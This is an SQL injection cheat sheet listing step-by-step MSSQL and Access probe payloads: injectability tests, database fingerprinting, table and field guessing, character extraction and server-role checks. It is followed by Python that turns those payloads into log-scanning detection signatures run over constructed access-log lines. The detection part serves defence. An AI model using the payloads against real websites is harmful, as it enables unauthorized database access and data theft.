1. Check whether the parameter is injectable: ;and 1=1   ;and 1=2
2. Initial check for MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [query condition] and ''='
4. When a search parameter is not filtered: 'and [query condition] and '%25'='
5. Identify the database system:
;and (select count(*) from sysobjects)>0    mssql
;and (select count(*) from msysobjects)>0   access
6. Guess the database: ;and (select Count(*) from [database name])>0
7. Guess the field: ;and (select Count(field name) from database name)>0
8. Guess the record length of the field: ;and (select top 1 len(field name) from database name)>0
9. (1) Guess the field's ASCII value (Access):
;and (select top 1 asc(mid(field name,1,1)) from database name)>0
(2) Guess the field's ASCII value (MSSQL):
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test the permission structure (MSSQL):
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
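As an added defender-side example (not part of the original cheat sheet), the following Python turns the probe payloads listed in the steps above into detection signatures and runs them over constructed access-log lines. The common log format, the client addresses and the stage labels are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# One regex per probing stage listed above, run over the URL-decoded,
# lower-cased request path so %20/%25 encoding does not hide the pattern.
PROBE_SIGNATURES = [
    ("boolean-test",          re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("mssql-user-check",      re.compile(r"\band\s+user\s*>\s*0")),
    ("string-context-probe",  re.compile(r"\band\s*'%?'\s*='")),
    ("db-fingerprint",        re.compile(r"\bfrom\s+m?sysobjects\b")),
    ("table-or-column-guess", re.compile(r"select\s+count\(")),
    ("length-or-char-guess",  re.compile(r"select\s+top\s+1\s+(len|asc|unicode)\(")),
    ("role-probe",            re.compile(r"is_srvrolemember\s*\(")),
]


def classify_request(url: str) -> list[str]:
    """Return the probe stages whose signature appears in one request URL."""
    decoded = unquote_plus(unquote_plus(url)).lower()  # two passes: catches %25xx
    return [label for label, rx in PROBE_SIGNATURES if rx.search(decoded)]


def scan_access_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (client_ip, stages) for each common-log-format line that matches."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 7:            # malformed line: skip rather than crash
            continue
        ip, url = parts[0], parts[6]  # CLF: ip ident user [time] "METHOD url proto" ...
        stages = classify_request(url)
        if stages:
            hits.append((ip, stages))
    return hits


# Constructed sample log lines (not real traffic); one client walks the steps above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /news.asp?id=12;and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /news.asp?id=12;and%20(select%20count(*)%20from%20sysobjects)>0 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /news.asp?id=12;and%201=(select%20IS_SRVROLEMEMBER(%27sysadmin%27));-- HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /search.asp?q=test%27and%20%27%2525%27=%27 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, stages in scan_access_log(SAMPLE_LOG):
        print(ip, ", ".join(stages))
```

A sequence of several stages from one client within a short window is a much stronger signal than any single match, so alert on the chain rather than on individual lines.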